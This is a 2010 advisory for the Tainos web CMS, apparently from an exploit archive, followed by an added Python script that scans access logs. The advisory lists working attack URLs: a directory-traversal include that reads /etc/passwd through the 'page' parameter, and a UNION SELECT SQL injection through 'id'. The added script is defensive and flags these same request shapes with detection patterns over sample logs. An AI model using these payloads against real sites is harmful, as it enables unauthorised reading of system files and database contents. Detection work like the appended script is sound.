
# Title : Tainos Multiple Vulnerabilities
# Published : 2010-05-16
# Author : XroGuE


########################################
# Name: Tainos Multiple Vulnerabilities
# Vendor: www.tainos-webdesign.com
# Date: 2010/05/16
# Author: Ashiyane Digital Security Team
# Discovered: XroGuE
# Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members
# Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com
########################################

########################################
[+] Local File Include Vulnerability:

[+] Vulnerability: www.Site.com/[path]/Page.php?page=[LFI]

[+] Example: http://[site]/index_offer.php?page=../../../../../../../../../../etc/passwd

[+] Example: http://[site]/nederlands/tours.php?page=../../../../../../../../../../etc/passwd

########################################

########################################
[+] SQL Injection Vulnerability:

[+] Vulnerability: www.site.com/index.php?id=[SQLi]

[+] Example: http://[site]/index.php?id=-9999+union+all+select+1,2,@@version,4,5

########################################
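
Added example (not part of the original advisory): a log triage script that flags the two request shapes shown above, directory traversal in the `page` parameter and UNION-based injection in the `id` parameter. The log lines are constructed, and the rule that `id` should be a plain integer is an assumption about the application.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines; addresses are documentation placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [16/May/2010:10:00:01 +0000] "GET /index_offer.php?page=offers HTTP/1.1" 200 5120
192.0.2.44 - - [16/May/2010:10:00:07 +0000] "GET /index_offer.php?page=../../../../etc/passwd HTTP/1.1" 200 1843
192.0.2.44 - - [16/May/2010:10:00:09 +0000] "GET /nederlands/tours.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843
192.0.2.44 - - [16/May/2010:10:00:15 +0000] "GET /index.php?id=-9999+union+all+select+1,2,@@version,4,5 HTTP/1.1" 200 2210
192.0.2.10 - - [16/May/2010:10:00:20 +0000] "GET /index.php?id=12 HTTP/1.1" 200 4096
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')
UNION_SELECT = re.compile(r'\bunion\b(?:\s+all)?\s+select\b', re.I)

def fully_decode(value, rounds=3):
    """Undo nested URL encoding (e.g. %252e) so the checks see the final value."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a sorted list of findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = set()
    for name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        value = fully_decode(raw)
        if name == "page" and TRAVERSAL.search(value):
            findings.add("lfi-traversal")
        if name == "id":
            # Assumption: legitimate id values are plain integers.
            if UNION_SELECT.search(value):
                findings.add("sqli-union")
            elif not re.fullmatch(r"\d+", value):
                findings.add("id-not-numeric")
    return sorted(findings)

def scan(log_text):
    # (line number, findings) for every line that triggered a rule
    return [(n, f) for n, line in enumerate(log_text.splitlines(), 1) if (f := classify(line))]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG):
        print(lineno, findings)
```

A 200 response on a flagged `page` request is worth checking against the response size of a normal page, since the same status is returned whether or not the include succeeded.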